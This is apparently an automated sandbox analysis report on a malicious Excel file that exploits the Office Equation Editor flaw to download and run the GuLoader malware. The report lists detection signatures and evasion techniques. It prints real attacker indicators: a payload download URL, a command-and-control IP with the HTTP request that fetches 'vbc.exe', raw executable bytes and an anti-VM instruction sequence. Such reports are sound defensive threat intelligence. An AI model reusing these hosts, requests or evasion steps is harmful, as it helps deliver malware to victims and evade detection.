Windows Analysis Report Order Request for Quotation.xlsx

Overview

General Information

Sample Name: Order Request for Quotation.xlsx
Analysis ID: 451298
MD5: 180907e797d9f4abe57d016b3a4a0da4
SHA1: 516bd547d90c8f4ae96c1d828908f3264012937b
SHA256: be589141d3e75f2d8b269dcca0afac7d30d6e2d10d376bb9fdd6236d164b7594
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1OPtVT-x7\"[OfT"}
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 71MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1OPtVT-x7"[OfT
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 20 Jul 2021 12:02:40 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 20 Jul 2021 09:26:12 GMTETag: "1d000-5c78aa51b4a66"Accept-Ranges: bytesContent-Length: 118784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e6 21 01 51 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 90 00 00 00 00 00 00 28 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 10 00 00 38 e2 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 4b 01 00 28 00 00 00 00 70 01 00 6a 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6a 6d 00 00 00 70 01 00 00 70 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.134Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3938F7BB.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.134Connection: Keep-Alive
Source: 3938F7BB.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D55D9 NtAllocateVirtualMemory, 6_2_003D55D9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D57A7 NtAllocateVirtualMemory, 6_2_003D57A7
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401128 6_2_00401128
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D55D9 6_2_003D55D9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3063 6_2_003D3063
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D20EB 6_2_003D20EB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7923 6_2_003D7923
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2114 6_2_003D2114
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3917 6_2_003D3917
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0974 6_2_003D0974
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8167 6_2_003D8167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D09EF 6_2_003D09EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4233 6_2_003D4233
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1262 6_2_003D1262
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D22A3 6_2_003D22A3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D82CB 6_2_003D82CB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D330A 6_2_003D330A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1CBD 6_2_003D1CBD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D54BA 6_2_003D54BA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0CA7 6_2_003D0CA7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D34EA 6_2_003D34EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2531 6_2_003D2531
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8501 6_2_003D8501
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D854C 6_2_003D854C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D26CF 6_2_003D26CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6F7F 6_2_003D6F7F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D379D 6_2_003D379D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0F9F 6_2_003D0F9F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0FFE 6_2_003D0FFE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D37D8 6_2_003D37D8
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Order Request for Quotation.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/13@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Order Request for Quotation.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE6F4.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Order Request for Quotation.xlsx Static file information: File size 1174528 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Order Request for Quotation.xlsx Initial sample: OLE indicators vbamacros = False
Source: Order Request for Quotation.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401128 push esi; retn 4D4Dh 6_2_0040263F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404916 push 00000014h; ret 6_2_00404938
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D383F push ebx; iretd 6_2_003D384A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3837 push ebx; iretd 6_2_003D383E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0837 push ebx; iretd 6_2_003D0842
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6837 push ebx; iretd 6_2_003D6842
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7037 push ebx; iretd 6_2_003D7042
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7837 push ebx; iretd 6_2_003D7842
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5033 push ebx; iretd 6_2_003D503E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D082B push ebx; iretd 6_2_003D0836
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D682B push ebx; iretd 6_2_003D6836
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D702B push ebx; iretd 6_2_003D7036
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D782B push ebx; iretd 6_2_003D7836
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D802A push esp; iretd 6_2_003D98BA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5027 push ebx; iretd 6_2_003D5032
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D081F push ebx; iretd 6_2_003D082A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D681F push ebx; iretd 6_2_003D682A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D701F push ebx; iretd 6_2_003D702A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D781F push ebx; iretd 6_2_003D782A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D501B push ebx; iretd 6_2_003D5026
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0813 push ebx; iretd 6_2_003D081E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6813 push ebx; iretd 6_2_003D681E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7013 push ebx; iretd 6_2_003D701E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7813 push ebx; iretd 6_2_003D781E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D500F push ebx; iretd 6_2_003D501A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0807 push ebx; iretd 6_2_003D0812
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6807 push ebx; iretd 6_2_003D6812
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7007 push ebx; iretd 6_2_003D7012
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7807 push ebx; iretd 6_2_003D7812
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5003 push ebx; iretd 6_2_003D500E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D107F push ebx; iretd 6_2_003D108A
Source: initial sample Static PE information: section name: .text entropy: 6.90665747983
Source: initial sample Static PE information: section name: .text entropy: 6.90665747983

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Order Request for Quotation.xlsx Stream path 'EncryptedPackage' entropy: 7.99848190617 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3917 6_2_003D3917
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8167 6_2_003D8167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6F7F 6_2_003D6F7F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D379D 6_2_003D379D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D37D8 6_2_003D37D8
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003D928F second address: 00000000003D928F instructions:
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003D9277 second address: 00000000003D928F instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 xor ecx, AF55D2FDh 0x00000009 mov dword ptr [edi+ecx], eax 0x0000000c mov ecx, C83BC8F2h 0x00000011 xor ecx, 51282A31h 0x00000017 pushad 0x00000018 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003D928F second address: 00000000003D928F instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3063 rdtsc 6_2_003D3063
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2220 Thread sleep time: -360000s >= -30000s Jump to behavior

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3063 rdtsc 6_2_003D3063
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3063 mov eax, dword ptr fs:[00000030h] 6_2_003D3063
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8167 mov eax, dword ptr fs:[00000030h] 6_2_003D8167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D732C mov eax, dword ptr fs:[00000030h] 6_2_003D732C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2531 mov eax, dword ptr fs:[00000030h] 6_2_003D2531
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4E17 mov eax, dword ptr fs:[00000030h] 6_2_003D4E17
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7730 mov eax, dword ptr fs:[00000030h] 6_2_003D7730

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2362172265.0000000000850000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs